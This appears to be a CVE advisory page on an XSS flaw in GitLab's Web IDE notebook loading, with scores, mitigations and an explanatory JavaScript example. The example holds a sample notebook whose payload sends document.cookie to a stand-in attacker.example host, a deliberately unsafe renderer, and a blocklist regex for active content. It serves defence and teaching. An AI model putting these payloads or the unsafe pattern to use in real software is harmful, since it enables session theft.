CVE-2024-10383
Published: 07 February 2025
Summary
CVE-2024-10383 is a high-severity Cross-site Scripting (CWE-79) vulnerability in GitLab CE/EE. Its CVSS base score is 8.7 (High).
Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks in the top 36.9% of CVEs by exploit likelihood and is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2024-10383 is a cross-site scripting (XSS) vulnerability, classified under CWE-79, in the gitlab-web-ide-vscode-fork component that GitLab's Web IDE loads from a CDN. It affects all versions of that component prior to 1.89.1-1.0.0-dev-20241118094343. The component is used by all versions of GitLab Community Edition (CE) and Enterprise Edition (EE) from 15.11 before 17.3, and versions 17.4, 17.5 and 17.6 were temporarily affected as well. The temporary exposure of those later releases is consistent with the component being fetched from the CDN at runtime rather than shipped inside the GitLab package, so the GitLab release number alone does not tell you whether an instance was exposed. The flaw is triggered when the Web IDE loads a .ipynb (Jupyter notebook) file.
The vulnerability carries a CVSS v3.1 base score of 8.7 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N). Exploitation is network-accessible with low attack complexity and requires only low privileges, for example being able to place a notebook file where a victim will open it, but it also requires user interaction: the victim must open the malicious .ipynb file in the Web IDE. The payload then runs as JavaScript in the victim's browser under the GitLab origin, which is why the scope is rated as changed, and it can read and modify whatever the victim's session can reach, hence the high confidentiality and integrity impact with no availability impact.
Mitigation details are in the referenced advisories: the GitLab issue at https://gitlab.com/gitlab-org/gitlab/-/issues/500785 and the HackerOne report at https://hackerone.com/reports/2765778. The fix is in gitlab-web-ide-vscode-fork version 1.89.1-1.0.0-dev-20241118094343 and later. Because the component is served from the CDN rather than installed with GitLab, administrators of affected instances should confirm that the Web IDE their users actually load is at or above that version rather than inferring exposure from the GitLab release number alone, and should keep GitLab on a supported release outside the affected ranges.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2024-53885
Vulnerability details
An issue has been discovered in the gitlab-web-ide-vscode-fork component distributed over CDN affecting all versions prior to 1.89.1-1.0.0-dev-20241118094343 and used by all versions of GitLab CE/EE starting from 15.11 prior to 17.3 and which also temporarily affected versions 17.4, 17.5 and 17.6, where an XSS attack was possible when loading .ipynb files in the web IDE.
- CWE(s): CWE-79 (Cross-site Scripting)
Related Threats
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The GitLab Web IDE is a public-facing web application, so delivering a malicious .ipynb file through it is direct exploitation of the application (T1190), and the payload the file carries runs as JavaScript in the victim's browser (T1059.007, Command and Scripting Interpreter: JavaScript) with the victim's GitLab session.
Affected Assets
- gitlab-web-ide-vscode-fork (CDN-distributed), all versions prior to 1.89.1-1.0.0-dev-20241118094343
- GitLab CE/EE from 15.11 up to but not including 17.3; versions 17.4, 17.5 and 17.6 temporarily affected
Mitigating Controls (NIST 800-53 r5)
- SI-15 (Information Output Filtering): filters what the Web IDE renders from .ipynb files so that notebook-supplied markup cannot execute as script.
- SI-10 (Information Input Validation): validates .ipynb content before the gitlab-web-ide-vscode-fork component processes it, rejecting or neutralising XSS payloads.
- SI-2 (Flaw Remediation): ensures timely remediation of the XSS flaw by updating the vulnerable gitlab-web-ide-vscode-fork component to a patched version.
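The two content controls above (output filtering and input validation) and the exploitation path described under Deeper analysis come down to one question: what does the viewer do with HTML that the notebook itself supplies? A .ipynb file is JSON, and notebook viewers render two parts of it as HTML, the source of markdown cells (markdown permits inline HTML) and any "text/html" output of a code cell. The JavaScript below is an added illustration of that bug class and its fix, not code from GitLab or from the gitlab-web-ide-vscode-fork, and it makes no claim about which of these paths the real component mishandled. The notebook is constructed, the payloads are placeholders that only name a hypothetical attacker.example host, and every function name is illustrative.

```javascript
// Added illustration of the CVE-2024-10383 bug class; NOT code from GitLab or
// from gitlab-web-ide-vscode-fork. Notebook viewers hand markdown cell source
// and "text/html" outputs to an HTML renderer; if that happens in the viewer's
// own origin, the notebook author gets script execution as whoever opens it.

// Constructed sample notebook (not a real exploit file): payloads sit in the
// two places a viewer typically renders as HTML.
const SAMPLE_NOTEBOOK = JSON.stringify({
  nbformat: 4,
  nbformat_minor: 5,
  metadata: {},
  cells: [
    {
      cell_type: "markdown",
      // Markdown allows inline HTML, so an event handler survives rendering.
      source: ["# Results\n", "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"],
    },
    {
      cell_type: "code",
      source: ["display(HTML(table))"],
      outputs: [
        { output_type: "display_data", data: { "text/html": ["<b>ok</b><script>alert(document.domain)</script>"] } },
        { output_type: "stream", name: "stdout", text: ["done\n"] },
      ],
    },
  ],
});

// nbformat allows source/text/mime data to be a string or a list of lines.
function joinLines(s) {
  return Array.isArray(s) ? s.join("") : (s == null ? "" : String(s));
}

// Every fragment of the notebook that a viewer would hand to an HTML renderer.
function htmlFragments(notebookJson) {
  const nb = JSON.parse(notebookJson);
  const frags = [];
  (nb.cells || []).forEach((cell, index) => {
    if (cell.cell_type === "markdown") {
      frags.push({ cell: index, kind: "markdown", html: joinLines(cell.source) });
    }
    for (const out of cell.outputs || []) {
      const html = out.data && out.data["text/html"];
      if (html !== undefined) {
        frags.push({ cell: index, kind: "text/html", html: joinLines(html) });
      }
    }
  });
  return frags;
}

// VULNERABLE pattern: notebook-supplied markup is concatenated into the page
// unchanged, so it runs in the viewer's origin with the viewer's session.
// (Markdown is treated as raw HTML here for brevity; a real viewer runs a
// markdown engine first, which passes inline HTML through unless told not to.)
function renderUnsafe(notebookJson) {
  return htmlFragments(notebookJson)
    .map((f) => `<div class="cell cell-${f.kind}">${f.html}</div>`)
    .join("\n");
}

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// HARDENED pattern: nothing the notebook supplies is interpreted as markup in
// the viewer's origin. Escaping stands in for what a production viewer does:
// render markdown, then pass the result through an allowlist sanitizer such as
// DOMPurify, and show rich text/html outputs inside a sandboxed iframe on a
// separate origin instead of in the main document.
function renderSafe(notebookJson) {
  return htmlFragments(notebookJson)
    .map((f) => `<div class="cell cell-${f.kind}"><pre>${escapeHtml(f.html)}</pre></div>`)
    .join("\n");
}

// Triage heuristic for scanning a repository's notebooks for cells carrying
// active content. A blocklist regex is NOT a sanitizer; it only points at
// cells worth a closer look.
const ACTIVE_CONTENT = /<\s*(script|iframe|object|embed|svg|math|base|meta|link)\b|\son[a-z]+\s*=|javascript:/i;

function findActiveContent(notebookJson) {
  return htmlFragments(notebookJson)
    .filter((f) => ACTIVE_CONTENT.test(f.html))
    .map((f) => ({ cell: f.cell, kind: f.kind }));
}

console.log(findActiveContent(SAMPLE_NOTEBOOK));
```

Running the sample through renderUnsafe leaves both the onerror handler and the script element intact in the page; renderSafe turns them into visible text, and findActiveContent flags cell 0 (markdown) and cell 1 (text/html) while ignoring the stdout stream, which is plain text and never reaches an HTML renderer.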